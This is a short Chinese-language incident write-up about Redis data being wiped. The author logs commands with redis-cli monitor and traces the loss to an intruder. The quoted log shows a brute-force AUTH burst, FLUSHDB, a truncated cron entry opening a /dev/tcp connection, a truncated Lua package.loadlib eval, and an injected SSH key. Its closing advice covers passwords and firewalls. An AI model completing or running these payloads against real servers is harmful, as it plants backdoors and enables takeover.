数据丢失排查思路
redis的数据无缘无故被清除,第一时间以为是内存不够,于是特意给redis分配了更多内存,但过了没几天数据还是丢失
日志监控
于是给reids增加了监控,记录每一次的执行操作
redis-cli -a "认证密码" monitor >/data/redis/redis-op.log
等待下一次丢失的时刻
果然发现有未知IP,连接了 redis,并且执行了黑入的命令
......
1700196657.193436 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.220648 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.247926 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.275196 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.302442 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.329673 [0 112.124.38.111:59790] "info" "server"
1700196657.356931 [0 112.124.38.111:59790] "FLUSHDB"
1700196657.384302 [0 112.124.38.111:59790] "set" "x" "\n* * * * * if ! ps | grep -v grep | grep -q oGywWxvO6y;then exec 6<>/dev
1700196657.438947 [0 112.124.38.111:59790] "eval" "local ver = string.match(_VERSION,\"%d.%d\");local io_l = package.loadlib(st
1700196657.466455 [0 112.124.38.111:59790] "FLUSHDB"
1700196657.493742 [0 112.124.38.111:59790] "set" "x" "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZh7PuIw0sqnlzZcJAYWJ8/vx4q/yfW
......
建议
1、立刻修改密码
2、服务器增加防火墙,防止未知IP骇人